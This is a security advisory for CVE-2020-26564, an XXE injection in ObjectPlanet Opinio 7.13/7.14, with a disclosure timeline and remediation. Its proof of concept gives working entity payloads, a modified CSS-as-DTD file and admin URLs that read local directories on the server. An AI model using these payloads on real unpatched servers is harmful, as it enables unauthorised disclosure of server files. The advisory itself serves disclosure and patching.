ObjectPlanet Opinio 7.13 / 7.14 XML Injection

2021.08.01
Credit: Daniel Tan
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng # CVE: CVE-2020-26564 # Exploit Title: ObjectPlanet Opinio version 7.13/7.14 allows XXE injection # Vendor Homepage: https://www.objectplanet.com/opinio/ # Software Link: https://www.objectplanet.com/opinio/ # Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng # CVE: CVE-2020-26564 # Timeline - September 2020: Initial discovery - October 2020: Reported to ObjectPlanet - November 2020: Fix/patch provided by ObjectPlanet - July 2021: CVE-2020-26564 # 1. Introduction Opinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed. # 2. Vulnerability Details ObjectPlanet Opinio before version 7.13 and 7.14 is vulnerable to XXE injection. # 3. Proof of Concept ### XXE leading to local file disclosure ### Step 1: URL: /opinio/admin/file.do?action=viewEditFileResource&resourceType=6&resourcePatch=upload/css/common/blueSurvey.css Opinio allows an administrative user to edit local CSS files, this is used to change the contents of a CSS file to a dtd reference file for the XXE injection The existing blueSurvey.css file was chosen for this PoC. Replace the contents of the file with: <!ENTITY all "%start;%file;%end;"> ------------------------------------------------------- Step 2: Utilize Opinios survey module and create a generic survey template. Export the template .xml file and add this snippet into the top of the .xml file: <!ENTITY % file SYSTEM "file:////C:\Users\"> <!ENTITY % start "<![CDATA["> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "file:////C:\<BASE_DIRECTORY>\opinio\upload\css\common\blueSurvey.css"> %dtd; Ensure the surveyIntro tag is inserted with the following payload (This will output the result in the surveyIntro field): <surveyIntro>&all;</surveyIntro> The base directory can be guessed via the information under Setup >> Edit System Settings , this page on Opinio shows the local directory of where Opinio was installed to. Import the modified .xml file to: /survey/admin/folderSurvey.do?action=viewImportSurvey['importFile'] ------------------------------------------------------- Step 3: The C:\Users\ directory can be viewed at : /opinio/admin/preview.do?action=previewSurvey&surveyId=<SURVEY_ID> This vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html # 4. Remediation Apply the latest fix/patch from objectplanet. # 5. Credits Timothy Tan (https://sg.linkedin.com/in/timtjh) Khor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/) Yu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/) Daniel Tan (https://www.linkedin.com/in/dantanjk/)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top